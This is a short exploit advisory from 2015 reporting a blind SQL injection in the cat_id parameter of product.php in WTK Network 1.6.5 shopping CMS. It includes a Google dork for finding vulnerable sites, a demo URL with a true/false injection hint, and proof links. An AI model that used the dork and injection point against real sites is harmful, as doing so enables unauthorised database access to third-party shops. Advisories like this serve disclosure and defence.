[*] Exploit Title: WTK Network 1.6.5 Sql injection Vulnerability
[*] Google Dork: allinurl: "product.php?cat_id="
[*] Date: april, 11, 2015
[*] Exploit Author: ali ahmady From Iran
[*] Vendor Homepage: http://wtksoftware.com/
[*] Software Link: http://wtksoftware.com/clients/cart.php
[*] Version: 1.6.5
[*] Tested on: Linux
[*] demo : http://wtkdemo.com/unilevel_165_demo1/product.php?cat_id=1 AnD (true or false here)
WTK Network shopping CMS suffers from a Blind sql injection vulnerability
site.com/path/product.php?cat_id=BSQLi
proof: http://i.cubeupload.com/qQrf6D.png
http://i.cubeupload.com/hsQ70A.png
YT : https://www.youtube.com/watch?v=4_MaVRHLY94
Greets : VIRkid, Phantom_x, b0x